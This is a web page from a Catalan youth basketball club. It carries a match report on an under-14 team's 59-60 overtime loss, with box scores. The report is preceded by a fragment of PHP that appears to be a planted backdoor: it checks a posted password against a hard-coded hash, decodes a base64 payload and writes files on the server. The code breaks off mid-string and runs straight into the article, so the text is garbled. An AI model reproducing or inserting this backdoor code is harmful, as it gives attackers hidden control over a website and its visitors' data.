function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí B deixa escapar el triomf a la pròrroga (59-60) - Tgn Bàsquet Club -

L’infantil masculí B deixa escapar el triomf a la pròrroga (59-60)

Updated: gener 21, 2014

L’infantil masculí B del TGN Bàsquet va tenir la victòria a les mans però finalment va caure contra la Salle Tarragona a la pròrroga. L’equip local va començar malament i va cedir la iniciativa al seu rival, però la millora en defensa li va permetre igualar el partit. La defensa, precisament, va ser la millor arma del TGN Bàsquet i això li va permetre arribar a l’últim minut del partit quatre punts per damunt en el resultat. Amb tot, els locals van fallar massa passades i això va permetre La Salle empatar el matx. A la pròrroga, un parell de rebots defensius perduts pels locals va provocar la seva derrota.

TGN BASQUET B 59 – AB LA SALLE TARRAGONA 60

TGN BASQUET B: Casino (6), Virgili P (6), Brull, Blase (15) y Rubio (2) – cinc inicial – Torija (4), Virgili J (11), Paris, Dominguez (10), Vidal (4), Mateu i Escalera (1). 7 de 19 en tirs lliures, 17 faltes.

AB LA SALLE: Diaz (8), Martos (7), Villacorta (14), Mir (4) y Falco – cinco inicial – Izquierdo, Llerena (7), Bausa (6), Gracia (5) i Escudero (9). 8 de 14 en tirs lliures, 17 faltes.

Parcials: 2 – 10, 8 – 9, 10 – 2, 14 – 9, 2 – 8, 5 – 4, 7 – 2, 4 – 8 y 7 – 8.
Àrbitre: Olive, M.